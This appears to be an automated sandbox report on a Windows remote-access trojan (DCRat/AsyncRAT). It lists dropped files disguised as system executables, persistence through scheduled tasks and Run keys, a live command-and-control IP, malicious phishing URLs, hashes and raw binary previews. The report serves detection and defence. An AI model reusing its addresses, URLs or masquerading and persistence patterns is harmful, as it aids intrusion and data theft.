  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures
  +-- UNFOT5F1qt.exe (started)
  |     Signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Injects a PE file into a foreign processes
  |     +-- UNFOT5F1qt.exe (started)
  |     |     Dropped: C:\Users\...\savesbrokerDriverSavesbroker.exe (PE32); C:\Users\user\...\FPS Booster 2.0.7.exe (PE32)
  |     |     +-- savesbrokerDriverSavesbroker.exe (started)
  |     |     |     Dropped: C:\Windows\regedit\explorer.exe (PE32); C:\Windows\SysWOW64\...\WerFault.exe (PE32); C:\Users\Public\Pictures\RuntimeBroker.exe (PE32); 4 other malicious files
  |     |     |     Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 7 other signatures
  |     |     |     +-- WerFault.exe (started)
  |     |     |     |     DNS/IP: 188.120.228.203, 49723, 49746, 49767 THEFIRST-ASRU Russian Federation
  |     |     |     |     Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  |     |     |     +-- schtasks.exe (started)
  |     |     |     +-- schtasks.exe (started)
  |     |     |     +-- 6 other processes
  |     |     +-- FPS Booster 2.0.7.exe (started)
  |     |           Dropped: C:\Users\user\AppData\Local\...\nsDialogs.dll (PE32); C:\Users\user\AppData\Local\...\System.dll (PE32)
  |     +-- WerFault.exe (started)
  |           Dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
  +-- explorer.exe (started)
  |     Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  +-- explorer.exe (started)
  |     Signatures: System process connects to network (likely due to code injection or exploit)
  +-- 2 other processes

Source | Detection | Scanner | Label
UNFOT5F1qt.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Nekark
UNFOT5F1qt.exe | 100% | Avira | HEUR/AGEN.1361787
UNFOT5F1qt.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | 100% | Avira | HEUR/AGEN.1309950
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 100% | Avira | HEUR/AGEN.1309950
C:\Users\Default\WmiPrvSE.exe | 100% | Avira | HEUR/AGEN.1309950
C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | 100% | Avira | HEUR/AGEN.1309950
C:\Users\Public\Pictures\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1309950
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 100% | Avira | HEUR/AGEN.1309950
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 100% | Avira | HEUR/AGEN.1309950
C:\Windows\regedit\explorer.exe | 100% | Avira | HEUR/AGEN.1309950
C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | 100% | Joe Sandbox ML |
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 100% | Joe Sandbox ML |
C:\Users\Default\WmiPrvSE.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | 100% | Joe Sandbox ML |
C:\Users\Public\Pictures\RuntimeBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 100% | Joe Sandbox ML |
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 100% | Joe Sandbox ML |
C:\Windows\regedit\explorer.exe | 100% | Joe Sandbox ML |
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
C:\ProgramData\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
C:\Users\Default\WmiPrvSE.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
C:\Users\Public\Pictures\RuntimeBroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nss20C1.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
C:\Windows\regedit\explorer.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.SpyNoon
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
188.120.228.203 | unknown | Russian Federation | 29182 | THEFIRST-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1563543
Start date and time: 2024-11-27 04:01:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: UNFOT5F1qt.exe (renamed because the original name is a hash value)
Original Sample Name: 1C40D9E61FBBD5D9054638B98B10E1CF.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@22/28@0/1
EGA Information:
• Successful, ratio: 44.4%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 346
• Number of non-executed functions: 59
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92
• Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, PID 7672 because it is empty
• Execution Graph export aborted for target HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, PID 8000 because it is empty
• Execution Graph export aborted for target WerFault.exe, PID 7604 because it is empty
• Execution Graph export aborted for target explorer.exe, PID 616 because it is empty
• Execution Graph export aborted for target explorer.exe, PID 7664 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: UNFOT5F1qt.exe
Time | Type | Description
03:02:04 | Task Scheduler | Run new task: explorer path: "C:\Windows\regedit\explorer.exe"
03:02:04 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run HSZUYllrTVQhIRaXpKBgYbmVnCoTc "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
03:02:05 | Task Scheduler | Run new task: HSZUYllrTVQhIRaXpKBgYbmVnCoTc path: "C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
03:02:05 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe"
03:02:05 | Task Scheduler | Run new task: WerFault path: "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
03:02:05 | Task Scheduler | Run new task: WmiPrvSE path: "C:\Users\Default User\WmiPrvSE.exe"
03:02:13 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Users\Default User\WmiPrvSE.exe"
03:02:22 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WerFault "C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
03:02:30 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Windows\regedit\explorer.exe"
03:02:39 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe"
22:02:07 | API Interceptor | 7x Sleep call for process: WerFault.exe modified
22:02:16 | API Interceptor | 6x Sleep call for process: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe modified
22:02:42 | API Interceptor | 8x Sleep call for process: explorer.exe modified
                                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: s-part-0035.t-0009.t-msedge.net
• file.exe | malicious | Unknown | 13.107.246.63
• file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 13.107.246.63
• file.exe | malicious | Unknown | 13.107.246.63
• HQV-224647.docx | malicious | HTMLPhisher | 13.107.246.63
• HQV-224647.docx | malicious | HTMLPhisher | 13.107.246.63
• GasProcessingPlantReportOfReceipts.xlsm | malicious | Unknown | 13.107.246.63
• file.exe | malicious | PureCrypter, Amadey, Cerbfyne Stealer, Credential Flusher, Cryptbot, LummaC Stealer, Poverty Stealer | 13.107.246.63
• Impact replications.xlsm | malicious | Unknown | 13.107.246.63
• HpRXI8oMC1.html | malicious | HTMLPhisher | 13.107.246.63
• https://eye.sbc31.net/m2?r=wAXNB1S4NjcyYWE1OWU4YjU5ODMzOTIyMDE1MThlxBDQudCvf9DH0Ns5RGzQktCKZ2wrLUbgpHRlc3Sxc2FtcGxlQHNhbXBsZS5jb22sKzMzNjEyMzQ1Njc4kLZEV3ZCbHJ1Y1JZMlFIa1B1LVVTTS1BoA== | malicious | HTMLPhisher | 13.107.246.63
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: THEFIRST-ASRU
• RustChecker.exe | malicious | PureLog Stealer, zgRAT | 188.120.239.221
• https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ== | malicious | Unknown | 78.24.219.84
• https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23cnlhbi5lZHdhcmRzQGF2ZW50aXYuY29t | malicious | Unknown | 78.24.219.84
• https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23bWJsYW5kQHNlY3VydXN0ZWNobm9sb2dpZXMuY29t | malicious | Unknown | 78.24.219.84
• exe009.exe | malicious | Emotet | 37.46.129.215
• https://sourcetrap.net | malicious | Unknown | 82.202.163.23
• 13LNMT6zmg.exe | malicious | DCRat | 80.87.201.118
• iwir64.elf | malicious | Mirai | 62.109.30.161
• 2VaAObAYLP.exe | malicious | DCRat | 185.43.5.93
• sh4.elf | malicious | Mirai | 212.109.220.3
                                          No context
                                          No context
Process: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 586240
Entropy (8bit): 5.885921147077287
Encrypted: false
SSDEEP: 12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
MD5: 222EDC84E2D32948F2639554B23E7B04
SHA1: 22CEDF83A69B08259DB3C2F3618DF067DD7C7522
SHA-256: 55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
SHA-512: 95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
Malicious: true
                                          Yara Hits:
                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: ditekSHen
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (986), with no line terminators
                                          Category:dropped
                                          Size (bytes):986
                                          Entropy (8bit):5.906779991524349
                                          Encrypted:false
                                          SSDEEP:24:JixpGULbOcU+yJmxrBp8mQch00iCajyVJUDxZ+G66:MTGULCc1yoNvIjCdkgG66
                                          MD5:FD9DDE45A48F496F17501FA2DB1CB01E
                                          SHA1:29413808B260EC6B417CF44883D36FAFA4E43D50
                                          SHA-256:A726C980560B07D22FAD7DF425D1A631F377F27D2AC00DC10D68075891C2ADCC
                                          SHA-512:FF4268DAAF39B4288D2F0D8EFF6D06CB2A4FD5EDAB5A9DAA247209B2BA86CAC506BDB9ED0B4807877D87ECCBF2FD57A83285859ABDEA9CE500429B2E4F03B4DF
                                          Malicious:false
                                          Preview:
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):586240
                                          Entropy (8bit):5.885921147077287
                                          Encrypted:false
                                          SSDEEP:12288:IqnOvrM40FWBGCnO9Ke6/jGEn1E7idK9IbrDDiokL05t4:I+OvrM40FgDRlrGwSO4S7DP
                                          MD5:222EDC84E2D32948F2639554B23E7B04
                                          SHA1:22CEDF83A69B08259DB3C2F3618DF067DD7C7522
                                          SHA-256:55AB1B21734F31815058FA1E2841E8B62E6E4F04E635A4B51EBEA3FDE646E920
                                          SHA-512:95DD51CF8BE6461955B867B853D58EAB7BF6AC363E9F99F5C8C8F13046DAA373ED845DB3531E9F765515E43F8955955EC4EA83F19807A2B3C04F2C1F6A0C6855
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 88%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L9a..........".................~.... ... ....@.. .......................`............@.................................(...S.... ..H....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H.... ......................@..@.reloc.......@......................@..B................`.......H.......P.......................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.0259638126222996
                                          Encrypted:false
                                          SSDEEP:192:eHlSnS0BU/Ha5aW9d4/zuiF5Z24IO8a5Y:qSZBU/6aZ/zuiF5Y4IO8cY
                                          MD5:021AF993098007A2C9ADD1779B397D71
                                          SHA1:C9289C906ACE22955A544559FF76886686822331
                                          SHA-256:13D504F8FFC91983744ED11B193DEAE5FB48228046325C2F10A3AE853CD9F7DD
                                          SHA-512:BB11C69A0F330897CCDD36EE4B96F123FEE70DD067355D24178ACD76EE504DCB98761FBA59CAC525C37C1D65CF3BDB3A1B6E3D87FA9A3455007C40590CAE3B70
                                          Malicious:true
                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.1.5.0.1.2.0.8.0.9.1.9.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.1.5.0.1.2.2.5.1.2.3.1.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.b.6.9.0.c.b.-.b.0.8.c.-.4.e.f.e.-.b.1.2.a.-.d.b.7.d.f.9.f.e.e.6.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.8.b.a.e.a.1.3.-.8.1.8.0.-.4.4.4.5.-.b.1.1.4.-.1.b.a.f.3.d.e.e.3.9.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.U.N.F.O.T.5.F.1.q.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.d.0.-.0.0.0.1.-.0.0.1.4.-.d.c.8.f.-.d.e.b.9.7.8.4.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.6.4.3.7.e.0.e.b.2.5.a.1.3.d.5.9.0.6.0.1.c.e.f.6.1.8.1.0.1.6.b.0.0.0.0.0.0.0.0.!.0.0.0.0.1.4.5.1.1.9.e.6.4.9.c.a.b.c.6.c.6.0.2.0.0.6.4.3.b.3.c.c.3.4.7.f.c.4.b.1.6.4.c.c.!.U.N.F.O.T.5.F.1.q.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 15 streams, Wed Nov 27 03:02:01 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):250518
                                          Entropy (8bit):3.730273535896813
                                          Encrypted:false
                                          SSDEEP:1536:ialHDEiCfCDpLTg+XGAjAHZZ0NNm5IdtTCleSVXanaeuMPRuBojRapN4uE2aO59U:BljEirpLTgsyo+y7meyl/iHc4uEq59
                                          MD5:B67B6BA2F08C0ACBF8980DF3683A1DB2
                                          SHA1:C7CCA85F49E89AEE3049E1E2592C8323BF797AA4
                                          SHA-256:A4CCAE82E2AA98E7ED3799759515A4ECFD17781622E34A8CAA42442C924DC7B2
                                          SHA-512:3B8028F2D709689688F2255DBBB3C4DE44451E6130C3AC31923CA8DAD8162DFE8C00B4D093010E3CE4719421A16FAAF57931FB010C9E802AA32A09915A825284
                                          Malicious:false
                                          Preview:MDMP..a..... .........Fg........................`...(.......$...........D&..NJ..........`.......8...........T............-...........................!..............................................................................eJ......0"......GenuineIntel............T.............Fg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):8410
                                          Entropy (8bit):3.696675188708636
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJap6iQTE6YcDX5SU9HDgmfZ49prO89bwPsfcQm:R6lXJk6/w6YA5SU9HDgmfCHw0fq
                                          MD5:1272107A50D27D7CC3298C94592C29F9
                                          SHA1:B3884FC0E586A2D7BBDBF0CB2060CD636893FA90
                                          SHA-256:ED2359A27780346505EC4ABD6886F1B2BD610CA19ED99708D715B96BB3D37F48
                                          SHA-512:53762E31E460BEB9856B99FDF6650D9D8782E573143588F81B6C9C03273E06CA0A0420E159E0F91B327331FA3CDB717B0B03CD525CC828359905D3533116125C
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.0.<./.P.i.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4704
                                          Entropy (8bit):4.479592116753323
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zs5Jg77aI9mViWWpW8VYzYm8M4J/S1FQ+q8viS7H7gQLPbVd:uIjfLI7qy7VbJbKRLPbVd
                                          MD5:CB7BBCCF75208BB1907D150754E8A0C7
                                          SHA1:36942B33990AF2B76664320E3DB368220535EEB0
                                          SHA-256:E969492E9F84E747D7997E01F5FD81F5A63A3C8B7EBEFAA548D5AC920208CC71
                                          SHA-512:1B48AE134AB607A08B6DA4CB9B9108E0DF92090EC8A64935E11EAE1F3AA572EF49E53CD3D7F0E302D56C4D1DB2AB45061A9D0033003F6A1A5916426730A8F56C
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="605884" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                          File Type:ASCII text, with very long lines (441), with no line terminators
                                          Category:dropped
                                          Size (bytes):441
                                          Entropy (8bit):5.856029485929199
                                          Encrypted:false
                                          SSDEEP:12:456TzsmrOMx+Fq0t3ZkVNn1dA4imBcwauMBKEat:fTzsRMx+FDt3Zs1OCBcFpBKEm
                                          MD5:885CFBC22BD7E6F39CE8B60B81E33615
                                          SHA1:39D19D70DF7D03BE4BC71605B663E88EE16F153F
                                          SHA-256:D9366373A90C8CFAD02E350A2784B5A5395F36A22D3896EFED388864DDE64F20
                                          SHA-512:111C09339515681AE7D58F82BC399DEE3366F484F9A9DF72DBDBBEBD96EC8A84BBB9A70D7583356E63F37B6657B0EA492DCEEC171D77DA0A6ACE87E67D81B64F
                                          Malicious:false
